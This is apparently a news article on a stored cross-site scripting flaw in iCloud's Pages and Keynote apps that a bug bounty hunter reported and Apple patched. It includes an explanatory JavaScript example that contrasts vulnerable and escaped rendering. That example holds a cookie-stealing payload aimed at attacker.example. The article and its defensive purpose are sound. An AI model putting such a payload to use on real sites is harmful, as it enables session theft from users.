Stored XSS bug in Apple iCloud domain disclosed by bug bounty hunter

The cross-site scripting bug reportedly earned the researcher a $5000 reward.
Written by Charlie Osborne, Contributing Writer

A stored cross-site scripting (XSS) vulnerability in the iCloud domain has reportedly been patched by Apple. 

Bug bounty hunter and penetration tester Vishal Bharad claims to have discovered the security flaw, which is a stored XSS issue in icloud.com. 

Stored XSS vulnerabilities, also known as persistent XSS, let an attacker save a malicious script on the target server so that it is later served to, and executed in the browsers of, other users who view the affected page. Because the script runs in the victim's origin, it can read cookies that are not marked HttpOnly, steal session tokens and other browser-accessible data, and perform actions on the site as the victim.

According to Bharad, the XSS flaw in icloud.com was found in the Pages and Keynote apps on Apple's iCloud domain.
In order to trigger the bug, an attacker needed to create a new Pages or Keynote document with an XSS payload submitted in its name field.  

This document would then need to be saved and either sent or shared with another user. The attacker would then make one or two further edits to the document, save it again, open "Settings" and select "Browse All Versions."  

After clicking on this option, the XSS payload would trigger, the researcher said.  
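The sequence above is the classic stored-XSS pattern: an untrusted string (the document name) is persisted on the server and later rendered into a page, here the version-history list, without output encoding. The following is an added illustration of that pattern and its fix, written for this article; it is not Apple's code and says nothing about how iCloud is actually implemented. The in-memory store, the `saveVersion`/`renderVersions*` functions, the document name and the payload are all constructed for the example.

```javascript
// Added example (not Apple's code): a minimal model of a stored XSS in a document name.
// A "name" is saved server-side on every save, then rendered into a version-history list.

const store = new Map(); // docId -> array of saved versions (constructed, in-memory)

// Persist one version of the document under the given name.
function saveVersion(docId, name) {
  if (!store.has(docId)) store.set(docId, []);
  const versions = store.get(docId);
  versions.push({ name, version: versions.length + 1 });
}

// Vulnerable: the untrusted name is concatenated straight into markup, so a
// script saved earlier executes in the viewer's browser when the list is shown.
function renderVersionsUnsafe(docId) {
  const rows = (store.get(docId) || []).map(v => `<li>v${v.version}: ${v.name}</li>`);
  return `<ul>${rows.join('')}</ul>`;
}

// Hardened: HTML-encode the five characters that can change markup context
// before the value is placed in element content or an attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

function renderVersionsSafe(docId) {
  const rows = (store.get(docId) || []).map(v => `<li>v${v.version}: ${escapeHtml(v.name)}</li>`);
  return `<ul>${rows.join('')}</ul>`;
}

// Check used below and in review: does the rendered markup still carry a live script tag?
function containsScript(html) {
  return /<script\b/i.test(html);
}

// Walk through the reported sequence: create with a payload in the name,
// edit and save again, then view the version list. Payload is constructed;
// attacker.example is a reserved example domain.
const payload = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
saveVersion('doc1', 'Quarterly plan ' + payload);
saveVersion('doc1', 'Quarterly plan (edited) ' + payload);

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe:', renderVersionsUnsafe('doc1'));
  console.log('safe:  ', renderVersionsSafe('doc1'));
}
```

The point to take from the two renderers is that the bug is in the output, not the input: rejecting angle brackets at the name field would not have protected a second view (the version history) that renders the same stored value. Encoding at the sink, together with a Content-Security-Policy that disallows inline script, is the check a reviewer would look for.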

Bharad also provided a Proof-of-Concept (PoC) video to demonstrate the vulnerability. 

The researcher disclosed the bug to Apple on August 7, 2020. On October 9 the report was accepted and Bharad received a $5,000 reward for his work. 

Bug bounty programs, such as those offered by HackerOne and Bugcrowd, remain a popular method for external researchers to report security issues to technology vendors. In 2020 alone, Google paid bug bounty hunters $6.7 million for their reports. 

ZDNet has reached out to Apple for comment and will update when we hear back.
